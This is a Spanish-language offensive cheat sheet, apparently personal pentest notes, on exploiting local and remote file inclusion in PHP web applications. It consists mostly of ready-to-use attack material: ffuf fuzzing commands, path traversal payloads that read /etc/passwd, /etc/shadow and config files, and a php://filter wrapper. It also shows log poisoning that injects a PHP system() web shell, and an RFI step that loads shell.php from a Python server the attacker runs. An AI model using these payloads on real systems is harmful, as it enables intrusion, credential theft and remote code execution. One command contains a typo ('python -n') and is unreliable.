$

LFI

#lfi#web

Podemos decubrir o detecatar que un LFI usando el siguiente fuzzing:

https://github.com/rowbot1/lfi.list/blob/master/list.list

ffuf -c -fs <NUMBER> -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
ffuf -request ../attendance.req --request-proto http -w command.txt -t 50 -x http://127.0.0.1:8080 -enc FUZZ:urlencode

Wordlist utiles

/etc/passwd
/etc/shadow
/etc/hosts
/etc/issue
/etc/group
/etc/hostname
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/var/log/messages
/var/log/cron.log
/var/log/auth.log
/var/www/html/wp-config.php
/var/www/configuration.php
/var/www/html/inc/header.inc.php
/var/www/html/sites/default/settings.php
/var/www/configuration.php
/var/www/config.php

C:\Windows\system32\drivers\etc\hosts
C:/Windows/system32/drivers/etc/hosts
C:\Windows\System32\drivers\etc\hosts
C:/Windows/System32/drivers/etc/hosts
C:/Windows/Panther/Unattend/Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:/Windows/Panther/Unattended.xml
C:\Windows\Panther\Unattended.xml
C:/Windows/Panther/Unattend.txt
C:\Windows\Panther\Unattend.txt
C:/Unattend.txt
C:\Unattend.txt
C:/Autounattend.txt
C:\Autounattend.txt
C:/Windows/system32/sysprep
C:/Windows/System32/sysprep
C:\Windows\system32\sysprep
C:\Windows\System32\sysprep
C:/inetpub/wwwroot
C:\inetpub\wwwroot
C:/inetpub/wwwroot/web.config
C:\inetpub\wwwroot\web.config
C:/inetpub/logs/logfiles
C:\inetpub\logs\logfiles

http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd

Hasta php 5.3

http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00

php://filter Wrapper

url=php://filter/convert.base64-encode/resource=app.php

Log Poisoning

Comprobar los siguientes logs:

/var/log/auth.log
/var/log/svftpd.log
/var/log/mail.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/nginx/access.log
/proc/self/environ

https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/logs-poisoning

Ingresar código PHP Malicioso

http://10.10.0.18/download.php?fid=<?php system(\$_GET['cmd']); ?>
http://10.10.0.18/download.php?fid=../../../../var/log/nginx/access.log&cmd=whoami

Comprobamos nuevamente el log:

../../../../../var/log/nginx/access.log

RFI

Para obtener un RFI, creamos un servidor HTTP con Python para compartir nuestra web shell, así:

# shell.php
<?php system($_GET['cmd']); ?>

python -n http.server 8000

/site/index.php?page=http://192.168.45.226:8000/shell.php&cmd=whoami